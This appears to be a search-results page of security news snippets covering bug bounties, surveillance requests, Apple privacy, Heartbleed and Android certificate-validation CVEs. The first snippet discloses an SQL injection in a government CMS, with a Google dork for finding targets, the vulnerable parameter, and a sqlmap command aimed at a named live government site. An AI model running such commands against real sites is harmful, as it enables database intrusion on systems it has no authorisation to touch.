3721 matches found
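SQL injection vulnerability in a government administrative CMS
Brief description: as per title. Details: Affected vendor: Shenzhen Taiji Software Co., Ltd. (深圳太极软件有限公司). Affected CMS: jsp+sqlserver; every injection runs with sa privileges. Google keyword: inurl:application/zwdt. The problem is in the global search, application/zwdt/query.jsp post:keyword= Five examples selected: 1.http://www.lzxzsp.gov.cn sqlmap -u "http://www.lzxzsp.gov.cn/application/zwdt/query.jsp" --data "keyword=1&Submit3=%B2%E9%D1%AF" --dbs sqlmap -u...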
As Bug Bounties Become the Norm, Challenges Remain
SEATTLE–For many years, Microsoft and other large software vendors resisted the idea of providing bug bounties or other financial incentives for researchers to report vulnerabilities. That changed when the landscape began to shift and more researchers began reporting vulnerabilities through broke...
Chinese Penetrate TRANSCOM Amid Lack of Data Sharing
Hackers allegedly affiliated with the Chinese government compromised the computer networks of the United States Transportation Command, the group tasked with providing air, land and sea transportation services to the Department of Defense, according to the findings of a Senate Armed Services...
Apple CEO Tim Cook Says Company Dedicated to Protecting Users' Privacy
While much of the tech community is still swooning over the iPhone 6, Apple Pay and Apple Watch, the company’s top executive is spending a lot of time and energy trying to reassure customers that Apple is doing everything it can to protect their privacy and the security of their data. Apple CEO T...
White House: Internet Not Borderless, but Lacking Interior
WASHINGTON D.C. – In an afternoon keynote address at the Billington Cybersecurity Summit yesterday, Michael Daniel, a special assistant to the president and White House Cybersecurity Coordinator, refuted the common sentiment that the Internet is difficult to defend because it is borderless. To th...
2014 Google Transparency Report Requests for Data Up Again
Against a backdrop of new surveillance programs being uncovered in New Zealand and allegations of the NSA and GCHQ’s penetration of Deutsche Telekom in Germany, Google yesterday published its biannual Transparency Report for the first half of 2014. Google’s numbers reflect not only a continually...
NSA Director Urges Cyber-Resilience at Billington Summit
WASHINGTON, D.C. – In his keynote address at the Billington Cybersecurity Summit, NSA Director and Commander of U.S. Cyber Command, Admiral Mike Rogers, explained that the Defense Department and corporate information security teams must focus on cyber-resiliency rather than total network...
Apple CEO Defends iMessage Security
Despite research published last year that demonstrated that Apple has the ability to decrypt users' iMessages if it so chooses, Apple CEO Tim Cook said that the company does not hold the encryption key for those messages and couldn’t even produce the plaintext in response to a government order. In...
“Heartbleed” vulnerability may have been used by government agencies before its announcement - vulnerability warning - the black bar safety net
The “Heartbleed” vulnerability is already one of the most serious flaws in the history of the Internet. However, a new study showed that before the “Heartbleed” vulnerability was disclosed in April, there is no evidence that it had been exploited by hackers on a large scale. “Bleeding...
Documents in Long-Running Yahoo FISC Challenge Case Published
During a long-running secret dispute between Yahoo and government officials over the constitutionality of orders from the federal government to turn over data belonging to Yahoo users, the company was facing fines of $250,000 for refusing to comply with the order. The revelation is contained in a...
Dropbox Reports 80 Percent of Subpoenas Contain Gag Request
Most U.S. government subpoenas for data on Dropbox users are accompanied with a request not to inform the user in question. Dropbox legal counsel Bart Volkmer said those gag orders are repelled unless there is a valid court order. The revelation accompanied the release of the cloud storage...
NSA threatened Yahoo with $250,000 Daily Fine For Opposing Surveillance Request
Yahoo! has broken its silence and explained why it handed over its users’ data to United States federal officials, thereby promising to expose those court documents which ordered the snooping. The US government threatened the Internet giant with a $250,000 fine per day several years ago if it failed t...
CVE-2014-5772
The Government Bookstore aka hksarg.isd.sop.govbookstore application 1.01 for Android does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate...
CVE-2014-5746
The Government Best Jobs aka com.wGovernmentBestJobs application 0.1 for Android does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate...
Information disclosure
The Government Bookstore aka hksarg.isd.sop.govbookstore application 1.01 for Android does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate...
Design/Logic Flaw
The Government Best Jobs aka com.wGovernmentBestJobs application 0.1 for Android does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate...
CVE-2014-5772
The CVE-2014-5772 entry concerns the Government Bookstore Android app (version 1.01). The vulnerability is that it does not verify X.509 certificates from SSL servers, which can allow man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate. Exploita...
CVE-2014-5746
The CVE-2014-5746 entry concerns the Government Best Jobs Android app (com.wGovernmentBestJobs) version 0.1, which does not verify X.509 certificates from SSL servers. This root cause enables man‑in‑the‑middle attackers to spoof servers and obtain sensitive information via a crafted certificate. ...